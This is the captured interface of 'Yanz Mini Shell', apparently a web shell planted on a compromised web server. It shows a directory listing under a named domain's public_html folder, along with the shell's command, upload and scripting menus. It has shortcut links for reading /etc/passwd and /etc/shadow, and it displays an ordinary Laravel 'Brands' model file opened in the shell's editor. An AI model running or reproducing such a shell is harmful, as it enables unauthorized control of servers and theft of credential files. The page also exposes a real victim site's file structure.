Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
admin-app
api
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\SoftDeletes; class Brands extends Model { use SoftDeletes; /** * The attributes that should be mutated to dates. * * @var array */ /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; /** * Return list of brands for a business * * @param int $business_id * @param bool $show_none = false * @return array */ public static function forDropdown($business_id, $show_none = false, $filter_use_for_repair = false) { $query = Brands::where('business_id', $business_id); if ($filter_use_for_repair) { $query->where('use_for_repair', 1); } $brands = $query->orderBy('name', 'asc') ->pluck('name', 'id'); if ($show_none) { $brands->prepend(__('lang_v1.none'), ''); } return $brands; } }
Free Space : 11683532800 Byte